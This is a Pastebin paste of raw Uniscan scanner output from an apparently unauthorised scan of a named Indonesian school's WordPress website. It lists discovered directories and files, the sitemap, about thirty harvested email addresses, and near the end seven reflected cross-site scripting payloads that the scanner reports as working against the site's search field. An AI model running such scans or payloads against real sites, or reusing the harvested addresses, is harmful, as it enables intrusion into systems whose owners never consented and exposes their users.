Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@javanese:~# uniscan -u http://smpnsata.sch.id/ -qweds
- ####################################
- # Uniscan project #
- # http://uniscan.sourceforge.net/ #
- ####################################
- V. 6.2
- Scan date: 2-9-2014 11:19:47
- ===================================================================================================
- | Domain: http://smpnsata.sch.id/
- | IP: 192.185.52.208
- ===================================================================================================
- |
- | Directory check:
- | [+] CODE: 200 URL: http://smpnsata.sch.id/aaa/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/cpanel/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/feed/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/fe/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/head/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/ide/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/lang/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/lan/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/pe/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/pro/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/rss/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/rs/
- | [+] CODE: 200 URL: http://smpnsata.sch.id/tips/
- ===================================================================================================
- |
- | File check:
- | [+] CODE: 200 URL: http://smpnsata.sch.id/favicon.ico
- | [+] CODE: 200 URL: http://smpnsata.sch.id/index.php
- | [+] CODE: 200 URL: http://smpnsata.sch.id/license.txt
- | [+] CODE: 200 URL: http://smpnsata.sch.id/mailman/listinfo
- | [+] CODE: 200 URL: http://smpnsata.sch.id/readme.html
- | [+] CODE: 200 URL: http://smpnsata.sch.id/robots.txt
- | [+] CODE: 200 URL: http://smpnsata.sch.id/search/htx/sqlqhit.asp
- | [+] CODE: 200 URL: http://smpnsata.sch.id/search/htx/SQLQHit.asp
- | [+] CODE: 200 URL: http://smpnsata.sch.id/search/sqlqhit.asp
- | [+] CODE: 200 URL: http://smpnsata.sch.id/search/SQLQHit.asp
- | [+] CODE: 200 URL: http://smpnsata.sch.id/sitemap.xml
- | [+] CODE: 200 URL: http://smpnsata.sch.id/xmlrpc.php
- ===================================================================================================
- |
- | Check robots.txt:
- | [+] User-agent: *
- | [+] Disallow: /wp-admin/
- | [+] Disallow: /wp-includes/
- | [+]
- | [+] Sitemap: http://smpnsata.sch.id/sitemap.xml.gz
- |
- | Check sitemap.xml:
- | [+] http://smpnsata.sch.id/
- | [+] http://smpnsata.sch.id/tata-tertib-lab-bahasa-smp-negeri-1-tayu/
- | [+] http://smpnsata.sch.id/lomba-keroncong-kodim-0718-pati/
- | [+] http://smpnsata.sch.id/purnawiyata-siswa-kelas-ix-smp-n-1-tayu/
- | [+] http://smpnsata.sch.id/pelaksanaan-un-di-smp-n-1-tayu-smpnsata-sukses/
- | [+] http://smpnsata.sch.id/juara-umum-lomba-mapel-ipa/
- | [+] http://smpnsata.sch.id/hasil-uji-coba-ujian-nasional/
- | [+] http://smpnsata.sch.id/prosedur-operasi-standar-ujian-nasional/
- | [+] http://smpnsata.sch.id/sekolah-favorit-pati-belahan-utara/
- | [+] http://smpnsata.sch.id/kegiatan-siswa-smp-n-1-tayu/
- | [+] http://smpnsata.sch.id/kurikulum-pendidikan-baru-tahun-ajaran-2013/
- | [+] http://smpnsata.sch.id/b-j-habibie-tidak-hanya-dikagumi-rakyat-indonesia-tetapi-juga-masyarakat-dunia/
- | [+] http://smpnsata.sch.id/rsbi-ciptakan-isu-diskriminasi-pendidikan/
- | [+] http://smpnsata.sch.id/25-antivirus-terbaik-tahun-2012/
- | [+] http://smpnsata.sch.id/hasil-tryout-i/
- | [+] http://smpnsata.sch.id/beda-watak-orang-indonesia-dan-jepang/
- | [+] http://smpnsata.sch.id/otak-tidak-sensitif-terhadap-rasa-sakit/
- | [+] http://smpnsata.sch.id/menyikap-fenomena-tawuran-antara-pelajar/
- | [+] http://smpnsata.sch.id/10-cara-menjadi-pelajar-berprestasi/
- | [+] http://smpnsata.sch.id/tips-sukses-olimpiade/
- | [+] http://smpnsata.sch.id/riwayat-singkat-berdirinya-smp-tayu/
- | [+] http://smpnsata.sch.id/sambutan/
- | [+] http://smpnsata.sch.id/prestasi/
- | [+] http://smpnsata.sch.id/gagasan/
- | [+] http://smpnsata.sch.id/profil-smp-n-1-tayu/
- | [+] http://smpnsata.sch.id/tips-sukses-dalam-belajar/
- | [+] http://smpnsata.sch.id/tips-sukses-menghadapi-ujian-nasional/
- | [+] http://smpnsata.sch.id/guru-pahlawan-pendidikan/
- | [+] http://smpnsata.sch.id/wajib-belajar-12-tahun-dan-kurikulum-baru/
- | [+] http://smpnsata.sch.id/fenomena-tawuran-antar-pelajar/
- | [+] http://smpnsata.sch.id/masalah-pendidikan-di-indonesia/
- | [+] http://smpnsata.sch.id/menanamkan-pendidikan-karakter-bangsa-adalah-suatu-prioritas/
- | [+] http://smpnsata.sch.id/pentingnya-pendidikan-karakter-dalam-dunia-pendidikan/
- | [+] http://smpnsata.sch.id/ujicoba-publik-isi-kurikulum-2013/
- | [+] http://smpnsata.sch.id/proses-pengembangan-kurikulum-baru/
- | [+] http://smpnsata.sch.id/langkah-awal-dalam-pendidikan-karakter/
- ===================================================================================================
- |
- | Crawler Started:
- | Plugin name: E-mail Detection v.1.1 Loaded.
- | Plugin name: Code Disclosure v.1.1 Loaded.
- | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
- | Plugin name: Upload Form Detect v.1.1 Loaded.
- | Plugin name: FCKeditor upload test v.1 Loaded.
- | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
- | Plugin name: phpinfo() Disclosure v.1 Loaded.
- | Plugin name: External Host Detect v.1.2 Loaded.
- | [+] Crawling finished, 808 URL's found!
- |
- | E-mails:
- | [+] E-mail Found: polonia2@gmail.com
- | [+] E-mail Found: gidibao@gmail.com
- | [+] E-mail Found: to@ryvkin.ru
- | [+] E-mail Found: m@tidakada.com
- | [+] E-mail Found: snowdog@o2.pl
- | [+] E-mail Found: hazem.khaled@gmail.com
- | [+] E-mail Found: kahi@kahi.cz
- | [+] E-mail Found: m2j@t-2.net
- | [+] E-mail Found: ashish@outshinesolutions.com
- | [+] E-mail Found: forkless@gmail.com
- | [+] E-mail Found: milanche@m2-j.info
- | [+] E-mail Found: hugo5688@gmail.com
- | [+] E-mail Found: m.eriksson@rocketmail.com
- | [+] E-mail Found: equipajedemano@gmail.com
- | [+] E-mail Found: email@smpnsata.sch.id
- | [+] E-mail Found: steagl@wordpress-it.it
- | [+] E-mail Found: baris.unver@beyn.org
- | [+] E-mail Found: mathewhendry@hotmail.com
- | [+] E-mail Found: tobias@tobiasbergius.se
- | [+] E-mail Found: pratyush.krishna@outshinesolutions.com
- | [+] E-mail Found: webmaster@hiromasa.zone.ne.jp
- | [+] E-mail Found: himself@arnebrachhold.de
- | [+] E-mail Found: stereo@stereo-lisa.org.ua
- | [+] E-mail Found: mailman@smpnsata.sch.id
- | [+] E-mail Found: rafael.lima@email.com.br
- | [+] E-mail Found: olli@jarva.fi
- | [+] E-mail Found: info@getid3.org
- | [+] E-mail Found: unfusion95@gmail.com
- | [+] E-mail Found: lupus.lupine@gmail.com
- |
- | Source Code Disclosure:
- |
- | Web Backdoors:
- |
- | File Upload Forms:
- |
- | FCKeditor File Upload:
- |
- | Timthumb:
- |
- | PHPinfo() Disclosure:
- |
- | External hosts:
- | [+] External Host Found: https://ssl.gstatic.com
- | [+] External Host Found: http://codex.wordpress.org
- | [+] External Host Found: http://www.mysql.com
- | [+] External Host Found: http://www.gnu.org
- | [+] External Host Found: http://php.net
- | [+] External Host Found: https://wordpress.org
- | [+] External Host Found: http://html5shim.googlecode.com
- | [+] External Host Found: http://planet.wordpress.org
- | [+] External Host Found: http://ajax.googleapis.com
- | [+] External Host Found: http://httpd.apache.org
- |
- | Ignored Files:
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-zh_TW.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-hu_HU.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-pl_PL.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ru_RU.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-pt_BR.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ja.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-de_DE.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-fr_FR.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-bg_BG.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ja_UTF.mo
- | http://smpnsata.sch.id/wp-admin/css/wp-admin.min.css?ver=3.9.2
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-it_IT.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-sv_SE.mo
- | http://smpnsata.sch.id/wp-includes/js/tinymce/skins/lightgray/fonts/readme.md
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-uk_UA.mo
- | http://smpnsata.sch.id//wp-includes/wlwmanifest.xml
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-tr_TR.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-es_ES.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-zh_CN.mo
- | http://smpnsata.sch.id/wp-includes/js/tinymce/wp-tinymce.js.gz
- | http://smpnsata.sch.id/wp-admin/css/ie.min.css?ver=3.9.2
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-sl_SI.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-fi_FI.mo
- | http://smpnsata.sch.id/wp-content/uploads/2014/08/TATA-TERTIB-LAB-BHS-TBS.docx
- | http://smpnsata.sch.id//wp-includes/js/tinymce/skins/lightgray/fonts/readme.md
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-cs_CZ.mo
- | http://smpnsata.sch.id/wp-includes/css/dashicons.min.css?ver=3.9.2
- | http://smpnsata.sch.id//wp-includes/js/tinymce/wp-tinymce.js.gz
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ar.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-da_DK.mo
- | http://smpnsata.sch.id/wp-admin/css/install.min.css?ver=3.9.2
- | http://smpnsata.sch.id/wp-content/uploads/2014/08/INSTRUMEN-DAN-RUBRIK-PENILAIAN-KURIKULUM-2013.docx
- | http://smpnsata.sch.id/wp-admin/css/install.css?ver=20100228
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ja_EUC.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ja_SJIS.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-nl_NL.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-hi_IN.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ko_KR.mo
- | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-by_BY.mo
- | http://smpnsata.sch.id/wp-includes/css/buttons.min.css?ver=3.9.2
- | http://smpnsata.sch.id/wp-includes/wlwmanifest.xml
- ===================================================================================================
- | Dynamic tests:
- | Plugin name: Learning New Directories v.1.2 Loaded.
- | Plugin name: FCKedior tests v.1.1 Loaded.
- | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
- | Plugin name: Find Backup Files v.1.2 Loaded.
- | Plugin name: Blind SQL-injection tests v.1.3 Loaded.
- | Plugin name: Local File Include tests v.1.1 Loaded.
- | Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
- | Plugin name: Remote Command Execution tests v.1.1 Loaded.
- | Plugin name: Remote File Include tests v.1.2 Loaded.
- | Plugin name: SQL-injection tests v.1.2 Loaded.
- | Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
- | Plugin name: Web Shell Finder v.1.3 Loaded.
- | [+] 37 New directories added
- |
- |
- | FCKeditor tests:
- |
- |
- | Timthumb < 1.33 vulnerability:
- |
- |
- | Backup Files:
- | Skipped because http://smpnsata.sch.id/wp-content/themes/pendidikan/testing123 did not return the code 404
- |
- |
- | Blind SQL Injection:
- |
- |
- | Local File Include:
- |
- |
- | PHP CGI Argument Injection:
- |
- |
- | Remote Command Execution:
- |
- |
- | Remote File Include:
- |
- |
- | SQL Injection:
- |
- |
- | Cross-Site Scripting (XSS):
- | [+] Vul [XSS] http://smpnsata.sch.id/
- | Post data: &s=<script>alert('XSS')</script>
- | [+] Vul [XSS] http://smpnsata.sch.id/
- | Post data: &s=<IMG SRC="javascript:alert('XSS');">
- | [+] Vul [XSS] http://smpnsata.sch.id/
- | Post data: &s=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- | [+] Vul [XSS] http://smpnsata.sch.id/
- | Post data: &s=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- | [+] Vul [XSS] http://smpnsata.sch.id/
- | Post data: &s=<body onload="javascript:alert('XSS')"></body>
- | [+] Vul [XSS] http://smpnsata.sch.id/
- | Post data: &s=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
- | [+] Vul [XSS] http://smpnsata.sch.id/
- | Post data: &s=<table background="javascript:alert('XSS')"></table>
- |
- |
- | Web Shell Finder:
- [*] Remaining tests: 8461
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement